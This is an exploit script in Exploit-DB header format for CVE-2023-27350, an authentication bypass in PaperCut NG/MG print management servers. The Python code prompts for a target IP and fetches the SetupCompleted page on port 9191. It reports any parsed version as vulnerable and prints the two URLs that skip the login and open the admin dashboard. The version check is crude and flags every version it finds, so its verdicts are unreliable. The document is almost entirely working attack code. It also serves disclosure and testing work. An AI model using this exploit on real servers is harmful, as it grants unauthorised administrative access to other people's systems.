# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass
# Date: 21 April 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://www.papercut.com/
# Version: 8.0 or later
# Tested on: 22.0.4
# CVE: CVE-2023-27350
import requests
from bs4 import BeautifulSoup
import re
def vuln_version():
ip = input("Enter the ip address: ")
url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted"
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
text_div = soup.find('div', class_='text')
product_span = text_div.find('span', class_='product')
# Search for the first span element containing a version number
version_span = None
for span in text_div.find_all('span'):
version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
if version_match:
version_span = span
break
if version_span is None:
print('Not Vulnerable')
else:
version_str = version_span.text.strip()
print('Version:', version_str)
print("Vulnerable version")
print(f"Step 1 visit this url first in your browser: {url}")
print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")
if __name__ =="__main__":
vuln_version()
